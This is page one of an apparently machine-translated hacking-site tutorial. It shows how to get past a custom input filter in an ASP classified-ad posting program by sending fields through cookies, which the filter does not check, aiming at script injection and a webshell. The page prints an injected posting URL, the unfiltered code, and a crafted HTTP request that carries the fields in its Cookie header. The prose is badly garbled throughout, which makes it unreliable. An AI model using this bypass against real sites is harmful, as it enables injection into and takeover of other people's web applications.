Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
The day discontinues the ASP receiving procedure crack
  Add date: 07/21/2008   Publishing date: 07/21/2008   Hits: 4
Total 2 pages, Current page:1, Jump to page:
 
Recently watched at the octonary number system forum in view of Bole the ASP receiving procedure crack analysis, achieves through the submission data gains the webshell method! Happen to have the friend to let me help to look at the day discontinue the submission question! Is mainly because some procedure user from has defined some functions, enables the original method not to be able to bypass the function, but yesterday looks, may realize through other methods!

First, day discontinue's other bug here does not look, looks at the submission process directly!

On-line announcement's submission process is similar this kind of connection:

http://www.xxx.com/post.asp?act=&d00=202&d01=

src= http://www.a.com >&d02=&d10=&d11=17000813&d20=&d21=&d22=&d23=&d30= day discontinue

&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123

Returns as shown in Figure 1 the expression normal insertion



We have a look at the examination data the page and the partial source code, as shown in Figure 2



But some procedures have actually used some from the defining function, carries on the confirmation and the filtration in view of the submission data

My here has a code to be as follows:

[Copy to clipboard] [-] CODE:

Trust many friends already looked, just like analyzes the website system to be the same, this was only aims at Request.QueryString and Request.Form from the definition code has carried on the filtration, has not carried on the filtration to the cookie submission's way! Then we have a look at the day discontinue again the gain way

strAreaName = request (“d00”)   // also has many, only writes one

….

….

if strAreaName "" then RS (“AreaName”) = strAreaName   // also has many, only writes one

….

….

This has not undergone the filtration the day discontinue code, increased is passed through from the defining function page the request variable the Function CheckStr(ChkStr) filtration, but also had one submission way is the cookie submission! Below we have a look at the submission method!

First is aims at time the normal submission carries on stresses a package of analysis, then carries on the data packet the structure, my here constructs the package as follows (here I revised real information, ^_^):

[Copy to clipboard] [-] CODE:

GET /post.asp?

act=&d00=202&d02=&d11=17000813&d20=&d21=&d22=&d23=&d30=cookie&d31=&d32=1&d33=&d40=0&d41=0&d4

2=0&d50=&d51=&d98=&d99=123 HTTP/1.1

Accept: */*

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)

Host: xxx.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDCATSSDRC=NAAGENEADMNBDLJJFMKLGMDO; d01=; d10=

Here data we only needed to put in through the cookie submission data in the cookie item to be possible, other might maintain invariable!

 
Other pages: : 1 * 2 * Next>>
Prev:Breaks through the Internet bar Winpcap installment limit - - jurisdiction magic Next:Pours into the downloading document the code to the IE advancement then execution downloading docume

Comment:

Category: Home > hacker course
Home